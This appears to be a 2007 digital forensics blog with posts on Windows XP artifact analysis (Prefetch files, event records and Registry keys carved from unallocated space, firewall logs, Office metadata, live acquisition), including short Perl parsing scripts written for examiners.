Saturday, June 02, 2007

AntiForensics Article

I read an interesting article recently that talks about antiforensics. At first glance, the article is something of an interesting piece, but reading it a second time and thinking about what was actually being said really got me thinking. Not because the article addresses the use of antiforensics, but because it identifies an issue (or issues) that needs to be addressed within the forensics community. Yes, these tools are out there, and we should be thankful that they were made available by someone...otherwise, how could we address the issue? So, what do we need to do to update our methodologies accordingly? Perhaps more importantly, should we be trying to get ahead of the power curve, rather than playing catch up?

I do feel that it is important to mention something else in the article that I found very concerning, though:
"...details of the TJX breach—called the biggest data heist in history, with more than 45 million credit card records compromised—strongly suggest that the criminals used antiforensics to maintain undetected access to the systems for months or years and capture data in real time."

Strongly suggest, how?

The article goes on to say:
"Several experts said it would be surprising if antiforensics weren’t used."

Several experts? Who? Were any of them involved in the investigation? If they were, what "expert" reveals this kind of information, and keeps his or her job? If not...why are they speculating? It just seems to me that this part of the article is out of place, and when viewed within the context of the entire article, breaks up the flow. The article has a logical progression of here's the issue, okay we've identified it, let's get about fixing it...which all makes sense...but then this bit of speculation seems out of place.

Overall, though, it appears that the article points to some issues that should be addressed within the digital forensic community. Are the tools we have worthless? Not at all. We just have to make better use of the information we have at hand. The article mentions building layers of "evidence", using multiple sources of information to correlate and support what we found in our digital investigation.

Also, Harlan's Corollary to Jesse's First Law of Computer Forensics really seems to be applicable now more than ever! ;-)

Thoughts on Live Acquisition

Recently, I've been doing some thinking about issues surrounding live acquisitions - specifically, acquiring an image from a system that is running, as opposed to either booting the system to an alternate OS, or removing the hard drive and hooking it up to a write-blocker.

There are several methods for performing a live acquisition, but most involve running an agent or application of some kind on the system itself. You can do this using ProDiscover (install or run the PDServer agent from a CD or thumb drive), FTK Imager (run from a CD or thumb drive, and write the image files to an external drive or an already-mapped share), or with good ol' dd and netcat running from a CD. Regardless of how you choose to do this, there is an additional process running on the system...so think Heisenberg's Uncertainty Principle, but in the digital realm.

So in acquiring an image from a live system, we need to introduce a process into a system of already running processes. While our intention is to take care and disturb the 'scene' as little as possible, it is simply a fact that we're going to leave some artifacts of our activities on the system...memory is consumed by our process, as are buffers, perhaps other processes have pages written out to the pagefile, etc. However, we address this issue with thorough documentation of our procedures and methodologies.

Now, in his book Computer Evidence: Collection & Preservation, Chris Brown describes the result of a live acquisition as a "smear", as from a temporal perspective, that's what we've got. Remember, it takes time to acquire an image from a hard drive, and if the system is still live and running when you acquire that image, then there is the distinct possibility that some sectors may change after you acquire them. Rather than having a sharp, distinct snapshot in time as when you acquire an image from a hard drive that has been removed from a system, you get a "smudge" or a "smear" instead. Also, as Greg Kelly pointed out in another forum recently, some of what we would normally consider stagnant data (Registry, files, etc.) can actually be considered volatile, and subject to change during the course of our acquisition...think log files, Event Log entries, the pagefile, etc.

Now, would it be possible to minimize this effect, by limiting what's running on the system during the acquisition? I believe that the answer to this is "yes". To do this, we'd need to take a couple of things into consideration. We should first ask ourselves, is this necessary? Hhhhmmm...if you're imaging the system over the network, and that system is still connected to the network, what is it doing on the network while you're acquiring your image? Is it serving up web pages, processing email, etc?

Before we continue, remember, we're talking about a live acquisition here, getting an image of the hard drive, NOT collecting the contents of memory.

Okay, that being said...if you're imaging over the network, is the system still providing services (shares via the Server service, etc.) that may have a significant effect on what you walk away with? We have to consider this in the face of what effect our actions will have on the system itself when we, say, disable a service. First, we have to see what processes are running, and to do that, we need to load some software and run another process (unless you're using the ProDiscover PDServer, as the agent provides this functionality, as well). Then we have to weigh the benefits of disabling the process or service against the "costs" of the effect that our actions have on the contents of the hard drive. Is that process really processing anything? We know that it may have file handles open, etc. But is there enough of an effect on the contents of the drive that it would make a significant difference within the time it takes to acquire the image? Also, if I disable that process/service, what happens? Any log files may be closed, perhaps the operating system itself will write an entry into the System or Application Event Log, etc.

Some of the processes or services I might consider shutting down include:
  • AntiVirus products - these things reach out on their own and update themselves, or run scans automatically
  • Task Scheduler - check to see if there are any jobs scheduled to run...this can get in the way of your acquisition (also, see the "Notes from the Underground..." sidebar on pp 215-216 of my book for an interesting tidbit on hiding scheduled tasks)
  • Windows Firewall - depending upon how it's configured (we'd want to check, of course) there may be some significant issues. I included a sample pfirewall.log file on the DVD with my book...I'd turned up logging on the firewall and hit it with nmap. ;-)
  • Exchange/IIS - if the system is still connected to the network do you want it processing email and web pages during the acquisition? Think the same thing for the FTP and SMTP services that sometimes get installed along with IIS.
This isn't meant to be a complete list, of course, but instead it's meant to start some thinking about what we have to consider before shutting a service down, or disabling a process.

So, before doing any of this, we need to put some thought into it. What, if anything, am I going to disable or shut down? Do I even need to? In some cases, live acquisitions I've done have been of systems that had already been taken off of the network (not by me) and shut down, and then rebooted so they could be acquired (acquisition via write-blocker was not possible). With no network connections, I'm not overly concerned about major changes to the system during the acquisition process...the NTP service may log a complaint with the Event Log, but little else may happen. However, this isn't always the case...we're seeing a greater need for live response, both in acquiring the contents of memory, as well as performing live acquisitions of major systems that cannot be brought down or offline. If this is the case, document it. On your acquisition worksheet or in your case notes, clearly state "these services could not be halted or disabled due to...".

This is just a first blush...getting my thoughts down, thinking through things, determining if there is even a strong enough need for something like this...perhaps a matrix of services and processes, and when it's a good idea to shut them down, how to do so, etc. Is this necessary?

Also, because I know the question is going to come up...addressing this same issue in the face of acquiring the contents of physical memory is an entirely separate post. Stay tuned!

Friday, June 01, 2007

A little about my book...

I apologize for this brief digression from the normal flow of the blog, but I've been receiving certain comments of late from several venues, and I thought I would address them all at once...

Many times, in forums (forii??) or email, someone will see me say "...as I mentioned in my book..." or "...as detailed in my book..." and I've received comments that some folks have been turned off by that. Okay, I can go with that, as I dislike sales pitches myself. So why do I say something like that?

The first conclusion that many seem to come to is that I'm trying to get you to purchase my book to line my pockets. Don't take this personally...but that is not only the first and most popular reaction, but also the most naive and uneducated one, as well. The folks who feel that way have not written a book and do not know what goes into writing such a book. Further, they have no idea how little an author makes on the sale of a book.

So why do it? Well, I wrote both of my books (first one and second one) as references...I had a lot of information to share, and I wanted to put it all in one place, and thought that it would be a good idea to do so in a manner that would make it available to others.

Now, I could post this stuff on the Internet for free, couldn't I? Rather than constantly rewriting the same thing over and over again into emails and posts, I could cut-n-paste it, or simply post it on the Internet and constantly repost the link. But that gets pretty tiresome...so why not put it into a book? Another benefit of having it in a book is that there is a certain amount of credibility to the material...after all, it has to be tech edited and reviewed. My first book had three tech reviewers (some more engaged than others)...my second one started with one, and ultimately had two. Look at who tech edited my second book, and also look at the names of folks who are acknowledged as having made contributions that were important to the development of the book...doesn't that give the material a bit more credibility than posting it to the Internet?

So the next time you see me say those words, and think to yourself, "man, I wish this guy would just shut up about his book!!", try thinking instead that there may be something useful in that book or on the DVD...Troy Larson thought so.

Tuesday, May 29, 2007

XP Firewall

Pp 216 - 218 of my book address the Windows XP firewall logs; where the file(s) is/are located on a system, and how they are useful to an investigation. I even include a sample firewall log on the DVD, generated when I enabled all logging and scanned my system with nmap from another system. I wanted folks to see what this kind of thing looks like, and I hope that you've found it beneficial.

Has anyone seen the "Bonus" directory on the DVD yet? Within the Bonus directory is a Perl script (and an associated EXE file...be sure to follow the instructions and keep the appropriate DLL with the EXE if you copy it off of the DVD) called "fw.pl" that uses WMI to get configuration information about the Windows XP firewall, and the SecurityCenter, in general.

Using either the Perl script or the EXE, type "-?" or "/h" at the command prompt to see the syntax information. Simply typing "fw.pl" or "fw" (for the EXE) tells the tool to collect and display all information. The tool displays basic information about the firewall, authorized applications, service/port information, SecurityCenter information, etc., all from a live system.

Porting this over to extracting the same information from an imaged system shouldn't be too difficult.
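As a starting point for that port, here's a sketch that pulls a few of the basic firewall policy values from a raw System hive file using the Parse-Win32Registry module. For simplicity it looks at ControlSet001 rather than resolving the current control set from the Select key, and the value names checked are just the obvious ones:

# fwpol.pl - sketch of the "port it to an image" idea: pull basic Windows
# Firewall policy settings from a raw System hive file. For simplicity,
# ControlSet001 is used rather than resolving the current control set.
use strict;
use Parse::Win32Registry;

my $hive = shift || die "Usage: fwpol.pl <System hive file>\n";
my $registry = Parse::Win32Registry->new($hive)
    || die "Could not parse $hive as a Registry hive file\n";
my $root = $registry->get_root_key();

my $base = 'ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy';
foreach my $profile ('StandardProfile', 'DomainProfile') {
    my $key = $root->get_subkey("$base\\$profile");
    next unless ($key);
    print "$profile (LastWrite: " . scalar gmtime($key->get_timestamp()) . " UTC)\n";
    foreach my $name ('EnableFirewall', 'DoNotAllowExceptions', 'DisableNotifications') {
        my $val = $key->get_value($name);
        printf("  %-22s %s\n", $name, defined($val) ? $val->get_data() : "(not set)");
    }
    print "\n";
}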

Note: The fw.exe file that you see in the Bonus directory was "compiled" from the Perl script using Perl2Exe. When I compiled the EXE, I used the "-small" switch so that the Perl runtime DLL would be pulled out as a separate file. However, other Perl modules are used as well, so I also compiled a version using the "-tiny" switch. This setting creates a separate DLL for each Perl module used, rather than pulling them out of the EXE at runtime and creating temporary files on the local hard drive. This file is in the "fw.zip" file...using the "-tiny" switch means that it's suitable for use in live response, particularly with the Forensic Server Project.

Saturday, May 26, 2007

XP Anti-Forensics

There is discussion now and again in computer forensic circles regarding "anti-forensics", techniques that are used on systems to remove or obfuscate the artifacts that an examiner may look for and analyze. These are usually discussed in the context of purposeful actions performed by a user or attacker, but not so much in the sense that there are "under the hood", "behind the scenes" activities that go on as part of normal, day-to-day operations of the operating system that can serve the same function.

What is it that happens behind the scenes on a live XP system that most of us don't really know about? Have you ever fired up FileMon or RegMon and just watched what they recorded on a live system, without you interacting with the system at all? Now...move the mouse pointer across the screen...

While XP is a treasure trove of artifacts for an examiner, there are also things that the examiner needs to keep in mind when performing artifact extraction and analysis, particularly when it comes to looking for deleted files. When a file is deleted on a Windows system (not moved to the Recycle Bin, but really deleted), it's common knowledge that it's not really gone. In a nutshell, the sectors that the file occupies are still on the hard drive, although they are now available for use by the operating system. And there's a lot that XP does to use those available sectors.

Many applications, such as MS Word, like to create temporary files while you're editing a document, and then delete those when you close the document. The sectors used by those temporary files need to come from somewhere. Yes, this is an application-specific issue and applies to any version of Windows that the application is running on.

XP creates System Restore Points, every 24 hrs by default, but also during various other actions, such as software installation or removal, etc. These Restore Points contain files that consume sectors. See my book for more information on Restore Point analysis.

Every three days, the XP Prefetch function performs a limited defragmentation of files on the hard drive. While this is limited, it still moves the contents of some sectors, overwriting others.

Speaking of XP Prefetch, when a user (any user) on the system launches a "new" application, a Prefetch file may be created for that application (assuming the 128 Prefetch file limit hasn't been reached). On my system, I have 104 .pf files, ranging in size from 8K to over 100K. Again, sectors are consumed.

As discussed in the Registry Analysis chapter of my book, there are a number of places within the Registry where a user's actions are recorded in some manner. New entries are added to the Registry, increasing the size of the files...not just the user's NTUSER.DAT file, but some actions will add entries to the HKLM hives, as well.

Of course, there are also a number of Registry settings that will have an effect on the examiner's analysis; these are addressed in detail in my book. While these aren't specific to XP, they do have a decidedly anti-forensic effect.

I mention these things because many times an examiner may be looking for evidence of a deleted file, carving unallocated space looking for a keyword or a file header, and come up empty. Remember Harlan's Corollary? ;-) Funny how there just seem to be more and more ways to apply that corollary...

Sites discussing anti-forensics aren't hard to find:
The MetaSploit AntiForensics Site
Ed Skoudis is quoted on antiforensics in 2003
Marcus K. Rogers' presentation
Ryan Harris' DFRWS paper

Friday, May 25, 2007

Prefetch Analysis

I've seen a couple of posts recently on other blogs (here's one from Mark McKinnon) pertaining to the Windows XP Prefetch capability, and I thought I'd throw out some interesting stuff on analysis that I've done with regards to the Prefetch folder.

First off, XP's Prefetch capability is meant to enhance the user eXPerience by helping frequently used applications load faster. Microsoft has a nice writeup on that, and portions of and references to that writeup are included in my book. XP has application prefetching turned on by default, and while Windows 2003 has the capability, only boot prefetching is turned on by default. So, XP systems are rich in data that can help you assess and resolve an incident investigation.

First off, XP can maintain up to 128 Prefetch files...these are files within the Windows\Prefetch directory that end in ".pf". These files contain a bunch of prefetched code, and the second half of the files generally contain a bunch of Unicode strings that point to various modules that were accessed when the application was launched. Also, each Prefetch file contains the run count (number of times the application has been run) as well as a FILETIME object representing the last time the application was launched, within the file itself (ie, metadata).
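For the curious, here's a bare-bones sketch (the ProScript on the DVD does considerably more) that pulls that metadata from a single .pf file. The offsets used (FILETIME at 0x78, run count DWORD at 0x90) apply to XP/2003 Prefetch files; later versions of Windows use a different layout:

# pfmeta.pl - bare-bones sketch: pull the last run time and run count out of
# an XP/2003 Prefetch (.pf) file. Last run time is a FILETIME at offset 0x78
# and the run count is a DWORD at offset 0x90.
use strict;

my $file = shift || die "Usage: pfmeta.pl <file.pf>\n";
open(my $fh, '<', $file) || die "Cannot open $file: $!\n";
binmode($fh);

my $buf;
seek($fh, 0x78, 0);
read($fh, $buf, 8);
my ($lo, $hi) = unpack("VV", $buf);
# FILETIME (100-nanosecond intervals since 1601) to Unix epoch time
my $runtime = int(($hi * 4294967296 + $lo) / 10000000) - 11644473600;

seek($fh, 0x90, 0);
read($fh, $buf, 4);
my $count = unpack("V", $buf);
close($fh);

print "File          : $file\n";
print "Last run time : ", scalar gmtime($runtime), " UTC\n";
print "Run count     : $count\n";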

Okay, so how can this information be used during forensics analysis? Remember Harlan's Corollary to the First Law of Computer Forensics? If you acquire an image from a system...say, a user's laptop...and you're told that the user had this laptop for a year or so, and you don't find any .pf files...what does that tell you?

Mark talked about U3 Smart Technology, and some of the Prefetch artifacts left behind by the use of tools like this. Excellent observations, but keep in mind that the Prefetch files aren't specific to a user...they're system-wide. On a multi-user system, you may have to look other places to determine which user launched the application in the first place. Ovie does a great job talking about the UserAssist keys and how they can help you narrow down who did what on the system.

I've looked to the Prefetch folder for assistance with an investigation. In one instance, there was a suspicion that a user had deleted some files and removed software from the system, and attempted to cover his tracks. While it was clear that the user had done some of these things (ie, removed software, emptied their Recycle Bin, etc.) it was also clear that they hadn't gone through the trouble of running one of those tools that delete everything; most of the artifacts I would look for were still in place (can you guess from my book what those artifacts might have been?). I found a reference to defrag.exe in the Prefetch folder, but nothing to indicate that the user had run the defrag tool (XP's built-in, automatic anti-forensics capabilities are a subject for another post). It turns out that as part of the Prefetch capability, XP runs a limited defrag every 3 days...the Prefetch capability prefetches XP's own prefetch functionality. ;-)

In another instance, I wanted to see if a user had burned anything to CD from the system. I found the installed software (Roxio Sonic), but found no references in any of the user artifacts to actually launching the software. I did, however, find an IMAPI.EXE-XXXXXX.pf file in the Prefetch directory. Interestingly enough, the Unicode strings within the file included a reference to iTunes, which, it appeared, the user used a lot. It turns out that iTunes likes to know where your CD or DVD burner is...I confirmed this on another system on which I knew the user used iTunes, and had not burned any CDs.

So, as a wrap up, some things to look for when you're digging into the Prefetch directory:

- How many .pf files (between 0 and 128) are in the Prefetch directory?

- For each .pf file, get the last run time and the run count. The last run time is a FILETIME object, meaning that it is maintained in UTC format...you may need to adjust using information from the TimeZoneInformation Registry key (ie, ActiveTimeBias).

- Correlate .pf files and the last run times to UserAssist key entries to tie activity to a specific user, as well as the Event Logs.

- Run strings to get the Unicode strings from the file and see what other modules were accessed when the application was launched.

Finally, there is a ProDiscover ProScript on the DVD that ships with my book (in the ch5 directory) that will locate the Prefetch folder (via the Registry) and automatically parse the .pf files, listing the last run time and run count for each. I have since updated that ProScript to display its output in time-sorted order, showing the most recent time first. I've found that this makes analysis a bit easier.

Saturday, May 19, 2007

New versions of tools released

I ran across a blog post this morning saying that new versions of pwdump6 and fgdump have been released.

So what does this have to do with forensic analysis? Well, like most folks, I've seen compromised systems that start by getting a downloader on the system, and the attacker is able to gain System level access and use something like wget to download their tools. I've seen not only the pwdump password dumping tool on systems, but I've also seen the output file from the command run sitting on the system...in some cases, in a public web directory with a corresponding query for that page in the web logs.

For those of you who use hash comparison tools, grab these puppies, hash 'em and store the hashes! If you don't do hash comparisons, or don't use this technique to a great extent, you should still be aware of the tools.

Litchfield on Oracle Live Response

Thanks to Richard Bejtlich, I learned this morning that David Litchfield, famed security researcher with NGSSoftware, has released a paper entitled Oracle Forensics Part 4: Live Response. In that paper, David starts off by discussing live response in general, which I found to be very interesting, as he addresses some of the questions that we all face when performing live response, particularly those regarding trust and assurance...trusting the operating system, trusting what the tools are telling us, etc.

David's paper highlights some of the aspects of live response that every responder needs to be aware of...in particular, when the first responder arrives on-scene and wants to collect volatile data, she will usually start by assessing the situation, and then when she's ready to collect that volatile data, insert a CD full of tools into the CD-ROM drive. From David's paper:

When they insert the CD and run one of the tools, due to the way Windows launches new processes, the tool will have key system dynamic link libraries in its address space, i.e. the memory the tool uses.

Great point...but keep in mind that at this point in time, during live response, there really isn't any way to avoid this situation. It happens, and it has to happen. The key to live response isn't how to keep it from happening...rather, it's to have a thoroughly documented process that lets you address the situation head on.

One of the main concerns about live response is often, if we do live response and have to take the information to court, how do we prove that our investigation did not modify the "scene" in any way, and that everything is pristine? The fact is...we can't. Nor should we try. Instead, we need to have a thorough, documented process, and be able to show that while our actions did modify the "scene" (via the application of Locard's Exchange Principle or Heisenberg's Uncertainty Principle...) just as an EMT's actions will modify a real-world crime scene, as investigators we should be looking at the totality of the information or evidence that we're able to collect and examine.

So, in a nutshell, while it is possible that the tools we loaded and ran on the system to collect volatile data were themselves compromised by a patched version of ntdll.dll in memory, what does the totality of the information tell us?

One thing I would suggest is that when you're reading David's excellent paper, and you get to the General Steps of Live Response section, refer back to the Order of Volatility. Dave is correct in that the application-specific information (about Oracle in this case) should be collected last, but IMHO the first thing that should be collected, as soon as possible, is a complete snapshot of physical memory (check out the sample chapter for my book, Windows Forensic Analysis). The reason I would suggest collecting the contents of physical memory first has to do with David's description of process creation...when a process is created, an EPROCESS block and all of the other structures necessary (at least one ETHREAD block) are created, consuming memory. This means that as processes are created, the pages used by other processes will be swapped out to the pagefile. Knowing this, we should collect as much of the contents of RAM as possible before moving on and collecting specific items, such as running processes, or the memory contents (RAM + pagefile) of those processes, etc.

Okay, enough about live response for now...this is a topic that deserves its own space.

I found David's paper to be particularly interesting, as some of the work I've been involved with (and likely will continue to be involved with) has had to do with databases; was the database compromised, and if so, was sensitive information extracted from the database? I'm not a database guy (ie, a DBA) but I do need to know some things about databases; per David's suggestion, it's often best for an incident responder to work shoulder-to-shoulder with an experienced DBA, bringing the forensics mindset (and requirements) to the table.

If you're interested in database security in general, check out David's databasesecurity.com site for more information and books related to database security. For additional information about other database topics, I picked up a link at Andrew Hay's blog, pointing to the Comprehensive SQL Injection Cheat Sheet (well, the cheat sheet is actually here). This resource is invaluable to anyone performing forensic analysis of a potentially compromised system, particularly if it either has a web server installed, or acted as a database back-end for a web-based system. Hint: any reference in web server logs to SQL stored procedures is worth looking at!

Sunday, May 13, 2007

Forensic Visualization

A while ago, I ran across an interesting 3D visualization project called fe3d. I remember thinking at the time that this would have been cool to have when I was performing vulnerability assessments. Something like this would have made analysis a bit easier...going through ASCII logs can be a pain...but it would have also been a plus in our deliverables, allowing us to provide the data in a visually appealing way to the customer. I'd used the old version of cheops before, as well.

I was reading Andrew Hay's blog this morning and came across an interesting post from O'Reilly SysAdmin that has to do with log file visualization. This looks very interesting. I haven't dug into the code itself yet, but I have to ask...has anyone used this for log file analysis during incident response?

Some thoughts that I had:

1. Using Marcus Ranum's artificial ignorance approach, read in the IIS web server logs from a case, and compare the entries to the actual pages on the web server (yes, I understand that this would take a couple of phases). If a request is made for a page that exists on the web server, set the color of the dot to green. If the request is made for a page that doesn't exist on the web server (as with a scan), set the color to red. (See the sketch following this list.)

2. Modify the code to use Event Logs, and tag certain events or records from each log with a particular color based on the event. Say, records from the Security Event Log get a particular color, or successful logins get one color and failed login attempts get another color.
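
For the first idea, a minimal Perl sketch might look something like the following. The path to a copy of the web content, the assumption that the log uses the default W3C extended field layout, and the simple color-per-line output (meant to feed whatever visualization front-end you're using) are all just illustrations...adjust to fit your case data.

#! c:\perl\bin\perl.exe
# iiscolor.pl - sketch: read an IIS W3C log, tag each request green if the
# requested page exists in a copy of the site's content, red if it doesn't
# (e.g., a scan).  Output is a simple CSV of color,method,uri.
use strict;
use File::Spec;

my $log     = shift || die "You must enter a log file.\n";
my $webroot = shift || die "You must enter the path to a copy of the web content.\n";

open(LOG, "<", $log) || die "Could not open $log: $!\n";
while (my $line = <LOG>) {
    chomp($line);
    next if ($line =~ /^#/);              # skip the W3C header lines
    my @fields = split(/\s+/, $line);
    # assumes the default field layout: date time s-ip cs-method cs-uri-stem ...
    my ($method, $uri) = @fields[3, 4];
    next unless (defined $uri);
    (my $rel = $uri) =~ s/^\/+//;
    $rel =~ s/\//\\/g;
    my $path  = File::Spec->catfile($webroot, $rel);
    my $color = (-e $path) ? "green" : "red";
    print "$color,$method,$uri\n";
}
close(LOG);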

I can see how something like this would be very helpful in visualization of data content, as well as presentation and reporting of the data that is found. I'm thinking more along the lines of reports to customers, but I'm sure that there are others out there who are thinking, "would something like this be useful in presenting data to a prosecutor, or to a jury??"

Saturday, May 12, 2007

Forensic Laws

I mentioned a concept or idea in my book, but I wanted to follow up on it a bit...something I believe to be a theorem. Okay, maybe not a theorem (there's no math involved), so how about a law. Let's call it the First Law of Computer Forensics. Yeah, yeah...that's the ticket! Kind of like "Murphy's Law".

With that being said...here goes:

There is evidence of every action.

Just to be above board on this, credit (or blame, you decide) goes to Jesse Kornblum. One thing to keep in mind about this law is that the evidence is there...it simply may not exist on the media that you're currently examining. For example, one question that I've seen in the lists is, how do you tell from an acquired image of a system if files were copied from it to, say, a thumb drive? Well, you may find the existence of the file on the system, and you will find that the thumb drive was plugged into the system (to see how to determine this on Windows systems, grab a copy of my book), but how do you determine if the file was copied to the thumb drive, if all you have is the image of the system? The fact is...you can't. You need the thumb drive. Even though the evidence you're looking for isn't on the image, it is on the thumb drive.

Now, here's Harlan's Corollary to the First Law of Computer Forensics:

Once you understand what actions or conditions create or modify an artifact, then the absence of that artifact is itself an artifact.

What this is saying is that not only is there evidence of every action, but the lack of that evidence is itself evidence.

Thoughts?

Addendum, 13 May: I wanted to point out that the example I gave of the laptop and the thumb drive is just that...an example. If you're starting to think that I'm making an absolute, definitive statement about the existence of an artifact on the thumb drive, please re-read the statement, and think of it only as an example. Thanks.

Friday, May 11, 2007

PPT Metadata

I received an email recently asking if I had any tools to extract metadata from PowerPoint presentations. Chapter 5 of my book includes the oledmp.pl Perl script, which grabs OLE information from Office files; this includes Word documents, Excel spreadsheets, and PowerPoint presentations. I've run some tests using this script, and pulled out things like revision number, created and last saved dates, author name, etc.

Pretty interesting stuff. There may be more...maybe based on interest and time, someone can look into this...

Here's an example of the oledmp.pl output from a PPT file (some of the info is masked to protect privacy):

C:\perl>oledmp.pl file.ppt
ListStreams
Stream : ♣DocumentSummaryInformation
Stream : Current User
Stream : ♣SummaryInformation
Stream : Pictures
Stream : PowerPoint Document

Trash Bin Size
BigBlocks 0
SystemSpace 876
SmallBlocks 0
FileEndSpace 1558

Summary Information
subject
lastauth Mary
lastprinted
appname Microsoft PowerPoint
created 09.06.2002, 19:51:48
lastsaved 14.09.2004, 19:08:39
revnum 32
Title Title
authress John Doe

Pictures
Current User
♣SummaryInformation
PowerPoint Document
♣DocumentSummaryInformation

So what does all this mean? Well, we see the various streams that are embedded in the document, and an example of what is extracted from the SummaryInformation stream. Some of this information can be seen by right-clicking on the file in Windows Explorer, choosing Properties, clicking the Summary tab, and then clicking the Advanced button.

Simple modifications to the oledmp.pl script will let you extract the stream tables, as well, showing even more available information.
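
If you want to poke at this yourself without the full oledmp.pl script, here's a minimal sketch that just walks the OLE/structured storage tree and lists the streams (much like the ListStreams output above), using the OLE::Storage_Lite module from CPAN. Parsing the property sets themselves (author, dates, revision number, etc.) is left to oledmp.pl.

#! c:\perl\bin\perl.exe
# listole.pl - sketch: walk the OLE tree of an Office file and list the
# storages and streams it contains.
use strict;
use OLE::Storage_Lite;

my $file = shift || die "You must enter a filename.\n";
my $ole  = OLE::Storage_Lite->new($file);
my $root = $ole->getPpsTree() || die "$file does not appear to be an OLE document.\n";

walk($root, 0);

sub walk {
    my ($pps, $depth) = @_;
    (my $name = $pps->{Name}) =~ s/\x00//g;    # names are stored as UCS-2
    my $type = ("", "Dir", "Stream", "", "", "Root")[$pps->{Type}] || "?";
    printf "%s%-8s %s\n", "  " x $depth, $type, $name;
    walk($_, $depth + 1) foreach (@{ $pps->{Child} || [] });
}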

Tuesday, May 08, 2007

Event Logs in Unallocated Space

I received an email from a friend recently, asking about finding an Event Log in unallocated (née "free") space. He mentioned that he'd found it using a hex editor and copied it out of the image to a separate file, but still couldn't open it in the Event Viewer.

That got me thinking about the content of my book, and how that could be useful in a situation like this. On page 201 of Windows Forensic Analysis, table 5.3 lists the event record structure; that is, what an event record "looks like". With this information alone, event records can be retrieved from unallocated space; once you find the "magic number", back up 4 bytes and you've got the size of the event record. From there, you can copy out the entire event record and the rest of the information within the record can be easily parsed from unallocated space, or even from the pagefile or a RAM dump.
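
As an illustration, here's a bare-bones sketch that does just that against a chunk of data (a file carved from unallocated space, a pagefile, or a RAM dump)...find the magic number, back up 4 bytes, read the size, and carve the record out to its own file. The sanity checks on the record size are arbitrary choices for this sketch; refer to table 5.3 for the full structure.

#! c:\perl\bin\perl.exe
# evtcarve.pl - sketch: scan a chunk of data for the event record magic
# number ("LfLe"), back up 4 bytes to get the record size, and carve each
# record out to its own file for further parsing.
use strict;

my $file = shift || die "You must enter a filename.\n";
open(FH, "<", $file) || die "Could not open $file: $!\n";
binmode(FH);
my $data;
{
    local $/;          # slurp the whole file; fine for reasonably sized chunks
    $data = <FH>;
}
close(FH);

my $ofs   = 0;
my $count = 0;
while (($ofs = index($data, "LfLe", $ofs)) > -1) {
    if ($ofs >= 4) {
        my $start = $ofs - 4;
        my $size  = unpack("V", substr($data, $start, 4));
        # arbitrary sanity check on the size before carving
        if ($size >= 0x38 && $size < 0x10000 && $start + $size <= length($data)) {
            $count++;
            my $out = sprintf("record%04d.bin", $count);
            open(OUT, ">", $out) || die "Could not open $out: $!\n";
            binmode(OUT);
            print OUT substr($data, $start, $size);
            close(OUT);
            printf "Record %d found at offset 0x%x, %d bytes\n", $count, $start, $size;
        }
    }
    $ofs += 4;
}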

A post from another forum got me thinking that the same is true for Registry keys, as well. Figure 4.3 illustrates a hex view of what a Registry key and a Registry value "look like" on disk. Using this information, as well as the code listed on pgs. 133 and 134, Registry keys and values can be extracted and reconstructed from unallocated space, the pagefile, or even a RAM dump.
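
Along the same lines, here's a quick sketch for Registry key cells. The offsets used below (LastWrite FILETIME 4 bytes past the "nk" signature, name length at 0x48, name at 0x4C) should be checked against Figure 4.3 and the code in the book before you rely on them, and the sanity checks are intentionally loose.

#! c:\perl\bin\perl.exe
# regcarve.pl - sketch: scan a chunk of data for Registry "nk" key records
# and print the key name and LastWrite time.
use strict;

my $file = shift || die "You must enter a filename.\n";
open(FH, "<", $file) || die "Could not open $file: $!\n";
binmode(FH);
my $data;
{ local $/; $data = <FH>; }
close(FH);

my $ofs = 0;
while (($ofs = index($data, "nk", $ofs)) > -1) {
    my ($lo, $hi) = unpack("VV", substr($data, $ofs + 0x04, 8));
    my $namelen   = unpack("v",  substr($data, $ofs + 0x48, 2));
    # crude sanity checks to weed out random "nk" hits
    if ($namelen > 0 && $namelen < 256 && $hi > 0x01a00000 && $hi < 0x02300000) {
        my $name = substr($data, $ofs + 0x4C, $namelen);
        my $time = ($hi * (2**32) + $lo) / 10000000 - 11644473600;
        if ($name =~ /^[\x20-\x7e]+$/ && $time > 0) {
            print gmtime($time) . " UTC  $name\n";
        }
    }
    $ofs += 2;
}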

The great thing is that event records and Registry keys have time stamps associated with them (Registry values do not). This also illustrates what can be retrieved from these other areas through data carving...after all, event records and Registry structures have "magic numbers", similar to file headers, and their data can be carved out just as easily.

Sunday, May 06, 2007

SOLD OUT!

I went by the Syngress site for my book today and saw a message that said, in part:

Sorry! This item is currently out of stock at syngress.com. You may want to check availability at the resellers listed on the item's catalog page.

Cool! Many thanks to everyone who has purchased a copy of the book, and to those who are going to...

Addendum, 8 May: I called a bunch of people at Syngress yesterday, leaving messages all over. I was somewhat concerned that the original page had been completely replaced, so no one could put the book on back-order, or view the Table of Contents or even the Sample Chapter. This morning, the order page is back up, sans the picture of the book cover.

Addendum, 9 May: Okay, false alarm, folks! I finally got through to someone at the publisher, and it turns out that while the books are running low due to the volume of orders, what really happened is that the web page fell victim to a developer!

Interviews

For anyone who is curious about my book, Windows Forensic Analysis (ToC and sample chapter available), I've had an opportunity to speak to some folks and answer some questions recently:

Andrew Hay's Q&A
29 Apr CyberSpeak Podcast with Ovie and Brett
ForensicFocus

I'm really looking forward to Andrew's review of my book.

Tuesday, May 01, 2007

Something Else To Look For...

Not long ago, Didier Stevens blogged about Windows Safe Mode and some Registry keys/values that pertain to Safe Mode. He filed this blog entry under "hacking". One of the cool things about computer forensics is that it's the flip side of hacking...discovering artifacts or "footprints" to find what kind of things happened on a system when it was "hacked".

Didier points out in his blog post how easy it is to write your own service that launches from Safe Mode. As more and more malware authors seem to be choosing a Windows service over the ubiquitous Run key in order to maintain the persistence of their malware on a system, it simply makes sense that a check should be made of the SafeBoot (Windows 2000, XP) key, as well.
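
For live response, a quick way to eyeball those entries is something like the following sketch, which uses the Win32::TieRegistry module to dump the entries beneath the SafeBoot\Minimal and SafeBoot\Network subkeys; anything that doesn't belong there should stand out.

#! c:\perl\bin\perl.exe
# safeboot.pl - sketch: list the entries beneath the SafeBoot Minimal and
# Network subkeys on a live 2000/XP system.
use strict;
use Win32::TieRegistry (Delimiter => "/");

foreach my $mode (qw/Minimal Network/) {
    my $path = "LMachine/SYSTEM/CurrentControlSet/Control/SafeBoot/$mode/";
    my $key  = $Registry->{$path} || next;
    print "SafeBoot\\$mode\n";
    foreach my $sub ($key->SubKeyNames()) {
        print "  $sub\n";
    }
    print "\n";
}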

